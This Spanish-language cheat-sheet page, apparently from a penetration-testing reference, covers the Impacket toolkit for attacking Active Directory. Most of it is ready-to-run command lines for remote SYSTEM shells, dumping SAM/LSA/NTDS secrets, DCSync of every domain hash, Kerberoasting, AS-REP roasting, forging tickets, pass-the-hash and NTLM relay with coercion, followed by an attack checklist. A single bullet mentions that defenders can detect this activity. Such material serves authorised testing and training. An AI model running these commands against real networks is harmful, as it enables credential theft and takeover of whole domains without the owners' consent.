Saltearse al contenido

Impacket

Impacket es una colección de scripts en Python que implementan protocolos de red Windows (SMB, Kerberos, MSRPC, LDAP). Es la caja de herramientas esencial para atacar Active Directory: ejecución remota, volcado de credenciales, ataques Kerberos y relay (ver área Windows & AD).

psexec.py domain/user:pass@host # shell SYSTEM (ruidoso, crea servicio)
wmiexec.py domain/user:pass@host # ejecución vía WMI (más sigiloso, semi-interactivo)
smbexec.py / atexec.py / dcomexec.py # variantes por distintos mecanismos
# todos soportan pass-the-hash: -hashes LM:NT (ver ad-creds)
secretsdump.py domain/user:pass@host # volcar SAM/LSA/NTDS (hashes, ver ad-creds)
secretsdump.py -just-dc domain/user:pass@DC # DCSync: volcar TODOS los hashes del dominio
# requiere privilegios de replicación (ver ad-creds/ad-persist) -> hashes de krbtgt, etc.
GetUserSPNs.py domain/user:pass -request # Kerberoasting (TGS de cuentas con SPN)
GetNPUsers.py domain/ -usersfile users.txt # AS-REP roasting (usuarios sin preauth)
ticketer.py / getST.py # forjar/solicitar tickets (golden/silver, delegación)
# los hashes obtenidos se crackean con hashcat (tool-hashcat)
ntlmrelayx.py -tf targets.txt -smb2support # relay de NTLM a otros servicios (ver ad-ntlm)
# combinado con responder/coerción (PetitPotam) -> uno de los ataques estrella en AD
mssqlclient.py / rpcdump.py / samrdump.py # MSSQL, enumeración RPC/usuarios
# en casi todos los scripts: -hashes LM:NT en vez de contraseña
psexec.py -hashes :<NThash> domain/user@host # PtH (ver ad-creds)
# Kerberos: -k -no-pass con un ticket en KRB5CCNAME (pass-the-ticket)
  • Impacket cubre ejecución remota (psexec/wmiexec), volcado (secretsdump/DCSync) y Kerberos (roasting, tickets) en AD.
  • Soporta pass-the-hash/ticket en casi todos los scripts (Volcado de credenciales).
  • ntlmrelayx + coerción es uno de los ataques estrella de AD (NTLM Relay).
  • Para el defensor: su actividad (creación de servicios, DCSync, roasting) genera eventos detectables (Detección & logging, Artefactos de Windows).
  • Usa el formato de credencial correcto: dominio/usuario:pass o -hashes :NTLM; muchos fallos son de sintaxis de auth.
  • Error típico: desajuste de reloj/Kerberos (KRB_AP_ERR_SKEW); sincroniza la hora con el DC (ntpdate/faketime).
  • secretsdump necesita privilegios altos; para DCSync hace falta una cuenta con derechos de replicación.
  • Scripts clave: psexec/smbexec/wmiexec (ejecución), secretsdump (volcado), ntlmrelayx (relay), GetUserSPNs (kerberoast).
  • Ejecución remota (psexec/wmiexec) con credencial o hash (PtH)
  • secretsdump para SAM/LSA; DCSync con privilegios de replicación
  • Kerberoasting (GetUserSPNs) y AS-REP (GetNPUsers) → crackear (hashcat & John)
  • ntlmrelayx para relay NTLM (NTLM Relay)
  • Pass-the-hash/ticket donde aplique (Volcado de credenciales)
  • Enumeración MSSQL/RPC si procede
  • Documentar; consciente de la detectabilidad